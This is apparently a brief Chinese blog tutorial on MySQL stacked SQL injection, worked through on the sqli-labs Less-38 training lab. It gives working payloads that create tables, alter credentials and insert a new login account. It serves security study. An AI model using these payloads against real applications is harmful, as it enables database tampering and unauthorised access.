sql堆叠注入随笔


0x00 堆叠注入介绍

Stacked injections(堆叠注入)顾名思义,就是多条语句同时执行,再mysql查询中我们常以;字符来结束一段语句的执行,那么是否可以考虑同时执行多条语句,使得其能够连续执行命令,从而达到我们想要的效果

堆叠注入条件:程序中存在堆叠函数mysqli_multi_query

数据库有可读可写权限,从而能够进行数据库的系列操作

向表中写入一个类似于users表结构的表:?id=1’;create table test like users;–+

修改表中字段:update users set username=’fzff’,password=’fsf’ where id=100;

创建新用户:?id=1’;insert into users(id,username,password) value (99,’hsy’,’hsyy’)–+

0x01 sql注入堆叠案例 less-38

利用堆叠注入添加账号密码进行登录
首先还是需要数据库有写入权限
创建新用户

?id=1';insert into users(id,username,password) value (99,'hsy','hsyy')--+

创建id=99一列


文章作者: 告白
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 告白 !
  目录